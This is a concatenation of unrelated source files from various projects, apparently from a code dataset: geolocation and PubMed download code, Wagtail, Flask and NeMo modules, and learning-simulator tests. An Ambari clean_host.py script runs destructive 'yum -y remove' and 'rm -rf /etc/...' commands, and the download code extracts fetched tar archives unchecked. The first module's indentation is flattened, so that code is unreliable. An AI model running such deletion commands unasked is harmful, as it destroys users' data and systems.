for record in records:
try:
probability = (int(record["Population"]) + 0.00000001)/(total_pop + 0.000001)
record["Probability"] = probability
except Exception as err:
logging.error("ERROR: %s for %s", err, record)
return records
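# Worked example of the population heuristic above (hypothetical records):
# for two candidates with populations 2,000,000 and 500,000, the assigned
# probabilities are ~0.8 and ~0.2, i.e. population / total population (the
# tiny epsilon terms only guard against zero totals). If the top record
# carries a code in FULL_CONFIDENCE_GEOCODES, it is kept as the sole candidate.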
def get_formatted_locs(location, mode=MODE_STRICT):
'''Get all possible locations for better desperate search'''
all_locs = []
# Cleanup and format string
clean_loc, finer_loc = location.strip(), ""
# If string contains a colon it is in GenBank format, so format it
gb_format = re.search(GB_COUNTRY_FIELD_REGEX, clean_loc)
if gb_format:
country = gb_format.group(1)
finer_loc = gb_format.group(2)
if "-" in finer_loc:
finer_loc = ", ".join([x.strip() for x in gb_format.group(2).split("-")])
clean_loc = finer_loc.strip() + ", " + country.strip()
all_locs.append(clean_loc)
# there are times when the locations are reversed
if finer_loc and "," in finer_loc:
finer_loc = ",".join([loc for loc in reversed(finer_loc.split(","))])
clean_loc = finer_loc.strip() + ", " + country.strip()
all_locs.append(clean_loc)
if mode != MODE_STRICT and clean_loc.split(","):
clean_loc = clean_loc.split(",")
for loc in clean_loc[:-1]:
trunc_loc = loc.strip() + ", " + clean_loc[-1].strip()
if trunc_loc not in all_locs:
all_locs.append(trunc_loc)
            trunc_loc = re.sub(GEO_STOPWORDS_RE, "", trunc_loc, flags=re.IGNORECASE)
if trunc_loc not in all_locs:
all_locs.append(trunc_loc.strip())
# Custom modifications
if trunc_loc.startswith("St"):
trunc_loc.replace("St", "Saint")
elif trunc_loc.startswith("Saint"):
trunc_loc.replace("Saint", "St")
if trunc_loc not in all_locs:
all_locs.append(trunc_loc)
if mode == MODE_DESPERATE:
last_loc = clean_loc[-1]
if last_loc not in all_locs:
all_locs.append(last_loc)
return all_locs
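# Illustrative expansion (hypothetical GenBank-style value):
#   get_formatted_locs("Australia: Queensland, Brisbane", MODE_EXPANDED)
# yields, roughly in order:
#   "Queensland, Brisbane, Australia"  (reformatted country field)
#   "Brisbane, Queensland, Australia"  (reversed finer locations)
#   "Brisbane, Australia"              (comma-truncated variants)
#   "Queensland, Australia"
# MODE_DESPERATE additionally falls back to the bare country name.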
def lookup_location_pop(location, mode=MODE_STRICT, count=1, debug=False):
'''Get Geoname Record using the location APIs and population heuristic'''
loc = []
all_locs = get_formatted_locs(location, mode)
for clean_loc in all_locs:
clean_loc = re.sub(CLEANUP_REGEX, ' ', clean_loc)
clean_loc = clean_loc.strip()
# search by comma splits, beneficial for country and strain fields
full = "full" if mode == MODE_DESPERATE else "default"
if clean_loc:
url = GEONAMES_URL.replace("LPH", clean_loc).replace("CPH", str(count)).replace("MPH", full)
resp = http_get_query(url)
if resp:
jsondata = resp.json()
if jsondata and "retrieved" in jsondata and int(jsondata["retrieved"]) > 0:
loc = jsondata["records"]
break
elif debug:
logging.debug("Search returned no results: '%s' -> '%s'", location, clean_loc)
else:
logging.error("Could not lookup location: %s, Check ZooPhy GeoNames API.", clean_loc)
elif debug:
logging.error("Invalid String: '%s' -> '%s'", location, clean_loc)
return loc
def normalize_entities(spans):
'''
    Normalize entities using only the information available in the extracted text.
    Strategies are currently limited to heuristics, for scalability and efficiency:
    1) population, i.e. prefer Paris, France over Paris, TX because of its population
    2) co-occurrence and proximity, i.e. 'Assam and Nagaland states in India'
    3) immediate hierarchy, i.e. Springfield, IL vs. Springfield, MA
    4) further strategies (e.g. dependency parsing or relationship extraction
       for establishing causality) are possible but not implemented
    TODO: co-occurrence is not implemented yet
'''
doc_ent_objs = []
if spans:
for span in spans:
if span.text.strip() and span.encoding == LOC_ANN_TAG:
records = lookup_location_pop(span.text, MODE_STRICT, 10)
poss_locs = extract_probability(records)
# Assume first location is the best location
best_loc = poss_locs[0] if len(poss_locs) > 0 else None
norm_ent_obj = NamedEntityObj(span, best_loc, poss_locs)
doc_ent_objs.append(norm_ent_obj)
# Remove entities that couldn't be resolved
doc_ent_objs = [x for x in doc_ent_objs if x.best_loc is not None]
return doc_ent_objs
def download_pubmed_record(pmid):
'''Extract pubmed text from the response'''
raw_json = ""
# try to get the pmcoa text from pmid
url = PMCOA_URL.replace("PMCOAPH", pmid)
resp = http_get_query(url)
    # if there is no OA full text, fall back to the PubMed abstract
try:
if resp.text:
if resp.text.find("[Error]", 0, 10) > -1:
logging.debug("Found in PM Only: %s", pmid)
url = PUBMED_URL.replace("PMPH", pmid)
resp = http_get_query(url)
if resp:
if resp.text.find("[Error]", 0, 10) > -1:
logging.error("PMID %s not found", pmid)
else:
raw_json = resp.text
else:
logging.debug("Found in PMC OA: %s", pmid)
raw_json = resp.text
if EXTRACT_SUPPLEMENTAL:
raw_json = download_supplemental(raw_json)
except Exception as error:
logging.error("Error retrieving json %s from PubMed/PMC OA server: %s", pmid, error)
return raw_json
def download_supplemental(raw_json):
'''Download supplemental files and add content to json'''
    # first retrieve the PMC id, as PMID is not supported
    pmcid = None  # initialize so the error handler below can always log it
    try:
doc_bioc = json.loads(raw_json)
pmcid = "PMC"+doc_bioc["documents"][0]["id"] if doc_bioc["source"] == "PMC" else None
passages = [passage for doc in doc_bioc["documents"] for passage in doc["passages"]]
# for doc in doc_bioc["documents"]:
for passage in passages:
section_type = passage["infons"]["section_type"]
if section_type == "SUPPL":
logging.debug("Attempting extraction of supplemental information from %s", pmcid)
url = PMC_OA_FTP_URL.replace("IDPH", pmcid)
resp = http_get_query(url)
xml = resp.text
query_re = re.search(FTP_REGEX, xml)
supp_text = passage["text"]
if query_re:
ftp_url = query_re.group(1)
pmcdir = ftp_get_query(ftp_url)
if pmcdir:
supp_text = extract_text_from_files(pmcdir)
passage["text"] = supp_text
break
# extract based on file format
# doc_bioc = format_supplemental_data(doc_bioc, supp_files)
raw_json = json.dumps(doc_bioc)
except Exception as error:
logging.error("Cant extract json from %s: %s", pmcid, error)
return raw_json
return raw_json
def extract_text_from_files(pmcdir):
supp_files = [x for x in listdir(pmcdir) if x.split(".")[-1] in SUPPLEMENTAL_DATA_FILETYPES]
logging.debug("Files for extraction in %s : %s", pmcdir, ",".join(supp_files))
# For now just extract all text the same way using textract
supp_file_contents = {x:str(textract.process(join(pmcdir, x))).replace("\\n", "\n") for x in supp_files}
supp_contents = ""
for suppfile, content in supp_file_contents.items():
supp_contents += "\n\n*** " + str(suppfile) + " ***\n" + str(content)
logging.debug("Added '%s' chars from '%s'", len(content), suppfile)
return supp_contents
def format_supplemental_data(doc_bioc, supp_files):
'''Format and add data to original json as per filetype
This is a TODO item and files should be formatted based on filetype
Observations in filetype
1) Tables in .doc and .docx format have pipe character i.e. | to separate columns
2) Excel format .xls and .xlsx may benefit from using pandas
3) .pdf is challenging
'''
return doc_bioc
def http_get_query(url, debug=False, timeout=5, retries=1):
'''Generic HTTP get query with error handling'''
resp = None
start = time.time()
while not resp and retries > 0:
try:
resp = requests.get(url, timeout=timeout)
except Exception as e:
logging.error("Error in GET: %s Error: %s", url, e)
retries -= 1
if debug:
logging.debug("URL: %s Time: %s", url, time.time()-start)
return resp
def ftp_get_query(url, debug=False, retries=1, unzip=True):
'''Generic FTP get query with error handling'''
extdir = None
start = time.time()
while not extdir and retries > 0:
try:
filename = url.split("/")[-1]
download_path = SUPPLEMENTAL_DATA_DIR+filename
with closing(request.urlopen(url)) as r:
with open(download_path, 'wb') as f:
shutil.copyfileobj(r, f)
if unzip:
with tarfile.open(download_path) as tarf:
tarf.extractall(SUPPLEMENTAL_DATA_DIR)
extdir = SUPPLEMENTAL_DATA_DIR+filename[:-7]
except Exception as e:
logging.error("Error in FTP: %s Error: %s", url, e)
retries -= 1
if debug:
logging.debug("URL: %s Time: %s", url, time.time()-start)
return extdir
| 43.087948 | 121 | 0.623828 |
ea7c9d654b862ff1c6628c6502dd2374c528a0ec | 555 | py | Python | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | 4 | 2015-05-05T16:44:42.000Z | 2020-10-27T09:45:23.000Z | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | null | null | null | src/spyd/game/client/message_handlers/editm_handler.py | DanSeraf/spyd | af893b7f9c67785613b25754eb2cf150523a9fe4 | [
"Zlib"
] | 2 | 2016-12-13T22:21:08.000Z | 2020-03-14T16:44:20.000Z | from spyd.registry_manager import register
from spyd.game.edit.selection import Selection
@register('client_message_handler')
class EditmHandler(object):
message_type = 'N_EDITM'
@staticmethod
def handle(client, room, message):
del message['aiclientnum']
player = client.get_player()
selection = Selection.from_message(message)
material = message['material']
material_filter = message['material_filter']
room.handle_player_event('edit_material', player, selection, material, material_filter)
| 32.647059 | 95 | 0.724324 |
a7d99d19c8cd559ebf96814bdceb44ac3debe1ae | 1,902 | py | Python | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | 1 | 2022-02-09T05:25:30.000Z | 2022-02-09T05:25:30.000Z | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | wagtail/images/rich_text/contentstate.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | """
Draftail / contentstate conversion
"""
from draftjs_exporter.dom import DOM
from wagtail.admin.rich_text.converters.contentstate_models import Entity
from wagtail.admin.rich_text.converters.html_to_contentstate import (
AtomicBlockEntityElementHandler,
)
from wagtail.images import get_image_model
from wagtail.images.formats import get_image_format
from wagtail.images.shortcuts import get_rendition_or_not_found
def image_entity(props):
"""
Helper to construct elements of the form
<embed alt="Right-aligned image" embedtype="image" format="right" id="1"/>
when converting from contentstate data
"""
return DOM.create_element(
"embed",
{
"embedtype": "image",
"format": props.get("format"),
"id": props.get("id"),
"alt": props.get("alt"),
},
)
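# For example (hypothetical props), {'format': 'right', 'id': 1, 'alt': 'A dog'}
# serializes to roughly: <embed embedtype="image" format="right" id="1" alt="A dog"/>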
class ImageElementHandler(AtomicBlockEntityElementHandler):
"""
Rule for building an image entity when converting from database representation
to contentstate
"""
def create_entity(self, name, attrs, state, contentstate):
Image = get_image_model()
try:
image = Image.objects.get(id=attrs["id"])
image_format = get_image_format(attrs["format"])
rendition = get_rendition_or_not_found(image, image_format.filter_spec)
src = rendition.url
except Image.DoesNotExist:
src = ""
return Entity(
"IMAGE",
"IMMUTABLE",
{
"id": attrs["id"],
"src": src,
"alt": attrs.get("alt"),
"format": attrs["format"],
},
)
ContentstateImageConversionRule = {
"from_database_format": {
'embed[embedtype="image"]': ImageElementHandler(),
},
"to_database_format": {"entity_decorators": {"IMAGE": image_entity}},
}
| 28.818182 | 83 | 0.621451 |
e6e50f4cd30240cdbc6b6faa0c04d122c24eb72f | 1,110 | py | Python | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 5 | 2017-07-20T11:15:10.000Z | 2020-04-16T15:42:55.000Z | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 3 | 2017-08-04T14:02:17.000Z | 2018-06-06T14:47:25.000Z | ambari-server/src/main/resources/custom_actions/scripts/clean_host.py | Arenadata/ambari | 4628267441121779113d98936dcdf5d9be60553c | [
"Apache-2.0"
] | 12 | 2017-05-17T09:48:01.000Z | 2021-08-05T19:01:25.000Z | import os
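# Purge Hadoop-ecosystem packages (Hadoop, Hive, HBase, Spark, Kafka, ZooKeeper,
# Oozie, Solr, Ranger, ...) and their library/config directories from this host.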
os.system('yum -y remove hadoop-*')
os.system('yum -y remove hive*')
os.system('yum -y remove pig-udf-datafu')
os.system('yum -y remove tez')
os.system('yum -y remove ranger-*')
os.system('yum -y remove hbase')
os.system('yum -y remove phoenix')
os.system('yum -y remove mahout')
os.system('yum -y remove zookeeper')
os.system('yum -y remove kafka')
os.system('yum -y remove kafka-server')
os.system('yum -y remove spark-*')
os.system('yum -y remove solr')
os.system('yum -y remove oozie*')
os.system('rm -rf /usr/lib/hadoop')
os.system('rm -rf /usr/lib/hadoop-*')
os.system('rm -rf /usr/lib/hive*')
os.system('rm -rf /usr/lib/hbase')
os.system('rm -rf /usr/lib/solr')
os.system('rm -rf /usr/lib/oozie')
os.system('rm -rf /usr/lib/spark')
os.system('rm -rf /usr/lib/phoenix')
os.system('rm -rf /usr/lib/zookeeper')
os.system('rm -rf /etc/hadoop')
os.system('rm -rf /etc/hive*')
os.system('rm -rf /etc/hbase')
os.system('rm -rf /etc/phoenix')
os.system('rm -rf /etc/kafka')
os.system('rm -rf /etc/oozie')
os.system('rm -rf /etc/solr')
os.system('rm -rf /etc/spark')
os.system('rm -rf /etc/zookeeper')
| 32.647059 | 41 | 0.672072 |
7e566cdb694a7b57a9469cd78840eb8308778c85 | 270 | py | Python | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | 8 | 2020-08-09T05:21:22.000Z | 2022-01-11T01:54:45.000Z | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | null | null | null | plugins/echo.py | Nicholasjl/python-OPQBot | 616318beac9f4187f6e20052222eeb9a42a65fc7 | [
"MIT"
] | null | null | null | from Control import on_command
from Message import send, sendGroup
@on_command("ECHO")
async def echo(message):
    if message.isGroup:
        await sendGroup(message.FromQQG, message.Content)
    else:
await send(message.FromQQ, message.Content) | 30 | 58 | 0.696296 |
36b5b69bd7e34275aa54ae7c92cf1c28b2d3acf8 | 160 | py | Python | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | 1 | 2021-02-08T17:20:47.000Z | 2021-02-08T17:20:47.000Z | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | null | null | null | classes/die.py | Inctus/DND-Dice | 2ed97544a9c1bfded61ea0ffcdc01f593cc5a8e1 | [
"MIT"
] | null | null | null | # MODULES
from random import randint
# CLASS
class Die():
def __init__(self, sides=6):
self.sides = sides
def roll(self):
return randint(1, self.sides) | 16 | 31 | 0.7 |
04208d83ed2294a0048dd65bd5b58e220ef8e891 | 801 | py | Python | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | lib/common.py | Seyaio/Seyabot | 0a8e63046ed208d301e9cb77d0b67b46ca6d9514 | [
"MIT"
] | null | null | null | from apscheduler.schedulers.asyncio import AsyncIOScheduler
import httpx
# Decorator implementing the singleton pattern
def SingleInstance(cls):
_instance = {}
def wrapper(*args, **kwargs):
if cls not in _instance:
_instance[cls] = cls(*args, **kwargs)
return _instance[cls]
return wrapper
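# Illustrative usage of the singleton decorator:
#
#     @SingleInstance
#     class Config(object): ...
#
#     Config() is Config()  # True -- every call returns the same instance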
# Timing decorator used for testing
def TestTime(func):
async def wrapper(*args, **kwargs):
import time
old_time = time.time()
res = await func(*args, **kwargs)
print(time.time() - old_time)
return res
return wrapper
# Used by scheduled (timed) tasks
runing_job_dict = {}
scheduler = AsyncIOScheduler(timezone='Asia/Shanghai')
# Shared HTTP client used by feature handlers
httpx_client = httpx.AsyncClient(timeout=httpx.Timeout(timeout=3.0))
# Used for storing sessions
# {session_id: {"funcname": "...", "session": session_obj}}
session_storage = {}
| 20.538462 | 68 | 0.654182 |
429c807ee1eeed7209c2241f00666eff4c8f0d41 | 645 | py | Python | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | app.py | Theropod/send2wechat_template | ccd3be070c7c040de4998661e69f458321bb37a7 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from wechat_work_helper import send_textmessage
from flask import Flask,request,jsonify,abort
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/send2wechat/api/v1/mstodo', methods=['POST'])
def sendmstodo():
    if not request.json or 'subject' not in request.json or 'time' not in request.json:
        abort(400)
    postcontent = 'N/A'
    if 'content' in request.json:
        postcontent = request.json['content']
textmessage = request.json['time'] + '\n' + request.json['subject'] + '\n' + postcontent
task = send_textmessage(textmessage)
return jsonify({'task': task}), 201
| 30.714286 | 92 | 0.668217 |
d2c328de7e703d0bd1be2f5ed3d1920f77d36099 | 12,149 | py | Python | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | 7 | 2020-07-14T20:30:23.000Z | 2022-02-14T05:58:22.000Z | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | 89 | 2020-11-25T18:38:21.000Z | 2022-02-25T12:37:45.000Z | tests/test_plots.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from .testutil import LsTestCase, run, get_plot_data
class TestInitialValues(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_initial_v(self):
# Test vplot
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_v: s1->b:7, default:1.5
@phase foo stop:s1=3
L1 s1 | L1
@run foo
@vplot s1->b
@vplot s2->b
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 2)
plot_data = get_plot_data()
s1b = plot_data['v(s1->b)']
s2b = plot_data['v(s2->b)']
self.assertEqual(s1b['x'], [0, 1, 2])
self.assertEqual(s2b['x'], [0, 1, 2])
self.assertEqual(s1b['y'][0], 7)
self.assertEqual(s2b['y'][0], 1.5)
# Test pplot
self.tearDown()
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
start_v: s1->b1:0.5, default:0
@phase foo stop:s1=10
nju_trial s1 | b1:S2 | @omit_learn, nju_trial
S2 s2 | @omit_learn, nju_trial
@run foo
@figure
@subplot 111 - {'ylim':[-0.1, 1.1]}
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 4)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0.5)
self.assertGreater(plot_data['p(s1->b1)']['y'][0], 0.622)
self.assertLess(plot_data['p(s1->b1)']['y'][0], 0.623)
# Test pplot with default start_v
self.tearDown()
text = '''
#n_subjects: 1
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
start_v: default:0
@phase foo stop:s1=100
nju_trial s1 | b1:S2 | @omit_learn, nju_trial
S2 s2 | @omit_learn, nju_trial
@run foo
@figure
xscale:s1
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 3)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0)
self.assertEqual(plot_data['p(s1->b1)']['y'][0], 0.5)
self.assertEqual(len(plot_data['p(s1->b1)']['x']), 100)
self.assertEqual(len(plot_data['p(s1->b1)']['y']), 100)
self.assertLess(plot_data['v(s1->b1)']['y'][99], 1.001)
self.assertGreater(plot_data['v(s1->b1)']['y'][99], 0.999)
self.assertLess(plot_data['p(s1->b1)']['y'][99], 0.8)
self.assertGreater(plot_data['p(s1->b1)']['y'][99], 0.6)
# Same as above but without @omit_learn
self.tearDown()
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase foo stop:s1=100
nju_trial s1 | b1:S2 | nju_trial
S2 s2 | nju_trial
@run foo
@figure
xscale = s1
@vplot s1->b1
@pplot s1->b1
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 3)
plot_data = get_plot_data()
self.assertEqual(plot_data['v(s1->b1)']['y'][0], 0)
self.assertEqual(plot_data['p(s1->b1)']['y'][0], 0.5)
self.assertEqual(len(plot_data['p(s1->b1)']['x']), 100)
self.assertEqual(len(plot_data['p(s1->b1)']['y']), 100)
self.assertGreater(plot_data['v(s1->b1)']['y'][99], 80)
self.assertLess(plot_data['p(s1->b1)']['y'][99], 1.01)
self.assertGreater(plot_data['p(s1->b1)']['y'][99], 0.99)
def test_initial_w(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_w: s1:1, s2:2
@phase foo stop:s1=3
L1 s1 | L1
@run foo
@wplot s1
@wplot s2
'''
script_obj, script_output = run(text)
self.assertEqual(len(script_obj.script_parser.postcmds.cmds), 2)
plot_data = get_plot_data()
s1 = plot_data['w(s1)']
s2 = plot_data['w(s2)']
self.assertEqual(s1['x'], [0, 1, 2])
self.assertEqual(s2['x'], [0, 1, 2])
self.assertEqual(s1['y'][0], 1)
self.assertEqual(s2['y'][0], 2)
class TestPlotProperties(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_phases(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1s stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase1nt stop:new_trial=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2s stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2nt stop:new_trial=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1s, phase2s runlabel:s
@run phase1nt, phase2nt runlabel:nt
@figure s
runlabel: s
phases: phase1s
@vplot s1->b1 {'label':'only_phase1s'}
phases: phase2s
@vplot s1->b1 {'label':'only_phase2s'}
phases: phase1s, phase2s
@vplot s1->b1 {'label':'both_phase1s_and_phase2s'}
@figure nt
runlabel: nt
phases: phase1nt
@vplot s1->b1 {'label':'only_phase1nt'}
phases: phase2nt
@vplot s1->b1 {'label':'only_phase2nt'}
phases: phase1nt, phase2nt
@vplot s1->b1 {'label':'both_phase1nt_and_phase2nt'}
'''
script_obj, script_output = run(text)
plot_data_s = get_plot_data(figure_number=1)
plot_data_nt = get_plot_data(figure_number=2)
self.assertEqual(plot_data_s['only_phase1s'],
plot_data_nt['only_phase1nt'])
self.assertEqual(plot_data_s['only_phase2s'],
plot_data_nt['only_phase2nt'])
self.assertEqual(plot_data_s['both_phase1s_and_phase2s'],
plot_data_nt['both_phase1nt_and_phase2nt'])
def test_phases_all(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
bind_trials: off
@phase phase1 stop:new_trial=5
new_trial s1 | new_trial
@run phase1
@vplot s1->b1 {'label':'phases not set'}
phases: all
@vplot s1->b1 {'label':'phases: all'}
phases: phase1
@vplot s1->b1 {'label':'phases: phase1'}
'''
script_obj, script_output = run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['phases not set'], plot_data['phases: all'])
self.assertEqual(plot_data['phases: all'], plot_data['phases: phase1'])
def test_phases_and_xscale(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1s stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase1nt stop:new_trial=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2s stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2nt stop:new_trial=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1s, phase2s runlabel:s
@run phase1nt, phase2nt runlabel:nt
@figure s
xscale: s1
runlabel: s
phases: phase1s
@vplot s1->b1 {'label':'only_phase1s'}
phases: phase2s
@vplot s1->b1 {'label':'only_phase2s'}
phases: phase1s, phase2s
@vplot s1->b1 {'label':'both_phase1s_and_phase2s'}
@figure nt
xscale: new_trial
runlabel: nt
phases: phase1nt
@vplot s1->b1 {'label':'only_phase1nt'}
phases: phase2nt
@vplot s1->b1 {'label':'only_phase2nt'}
phases: phase1nt, phase2nt
@vplot s1->b1 {'label':'both_phase1nt_and_phase2nt'}
'''
script_obj, script_output = run(text)
plot_data_s = get_plot_data(figure_number=1)
plot_data_nt = get_plot_data(figure_number=2)
self.assertEqual(plot_data_s['only_phase1s'],
plot_data_nt['only_phase1nt'])
self.assertEqual(plot_data_s['only_phase2s'],
plot_data_nt['only_phase2nt'])
self.assertEqual(plot_data_s['both_phase1s_and_phase2s'],
plot_data_nt['both_phase1nt_and_phase2nt'])
def test_phase_order_not_run_order1(self):
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1, b2
u: s1:1, default:0
@phase phase1 stop:S1=5
S1 s1 | S1
@run phase1
@wplot s1
'''
run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [0, 1, 2, 3, 4])
def test_phase_order_not_run_order2(self):
"""
Test that the first value in plot (x=0) is
        - initial value if the first phase in 'phases' is the first run phase,
- last value of previous phase if the first phase in 'phases' is not the first run phase.
"""
text = '''
mechanism: ga
stimulus_elements: s1, s2, s3
behaviors: b1, b2
u: s1:1
@phase phase1 stop:S1=5
S1 s1 | S1
@phase phase2 stop:S2=10
S1 s1 | new_trial
@run phase1, phase2, phase3
phases: phase2, phase1
@nplot s1
'''
# assert(False) # Test all plot types and that y(0) is last value in previous phase
# (or start value if first phase)
def test_run_phases(self):
"""
Test that running two phases and plotting only the first is the same as running
and plotting only the first.
"""
text = '''
mechanism: ga
stimulus_elements: s1, s2
behaviors: b1 # Only one behavior to make plots deterministic
u: s2:1, default:0
bind_trials: off
start_v: default:0
@phase phase1 stop:s1=10
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@phase phase2 stop:s1=20
new_trial s1 | b1:S2 | new_trial
S2 s2 | new_trial
@run phase1, phase2 runlabel:both
@run phase1 runlabel:phase1
runlabel: both
phases: phase1
@vplot s1->b1 {'label':'run_both_plot_first'}
runlabel: phase1
phases: all
@vplot s1->b1 {'label':'run_only_first'}
'''
script_obj, script_output = run(text)
plot_data = get_plot_data()
self.assertEqual(plot_data['run_both_plot_first'],
plot_data['run_only_first'])
class TestExceptions(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_no_run(self):
text = """
mechanism: ga
stimulus_elements: s1, s2
behaviors: b
start_v: s1->b:7, default:1.5
@phase foo stop:s1=2
L1 s1 | L1
@vplot s1->b
"""
msg = "Error on line 8: There is no @RUN."
with self.assertRaisesMsg(msg):
run(text)
| 28.451991 | 97 | 0.55412 |
623b8e97872ef244be0452b3d16a235a723f1cb9 | 1,830 | py | Python | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | 2 | 2019-11-14T17:25:12.000Z | 2021-02-22T19:54:48.000Z | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | null | null | null | nemo_text_processing/text_normalization/en/taggers/punctuation.py | 23jura23/NeMo | 6815146775432852feee1bc28ed1a7a2fc94010d | [
"Apache-2.0"
] | 2 | 2020-06-13T15:04:41.000Z | 2020-08-19T20:13:01.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
# Copyright 2015 and onwards Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from unicodedata import category
from nemo_text_processing.text_normalization.en.graph_utils import GraphFst
try:
import pynini
from pynini.lib import pynutil
    PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
class PunctuationFst(GraphFst):
"""
Finite state transducer for classifying punctuation
e.g. a, -> tokens { name: "a" } tokens { name: "," }
Args:
deterministic: if True will provide a single transduction option,
for False multiple transduction are generated (used for audio-based normalization)
"""
def __init__(self, deterministic: bool = True):
super().__init__(name="punctuation", kind="classify", deterministic=deterministic)
s = "!#$%&\'()*+,-./:;<=>?@^_`{|}~\""
punct_unicode = [chr(i) for i in range(sys.maxunicode) if category(chr(i)).startswith("P")]
punct_unicode.remove('[')
punct_unicode.remove(']')
punct = pynini.union(*s) | pynini.union(*punct_unicode)
self.graph = punct
self.fst = (pynutil.insert("name: \"") + self.graph + pynutil.insert("\"")).optimize()
| 34.528302 | 99 | 0.691257 |
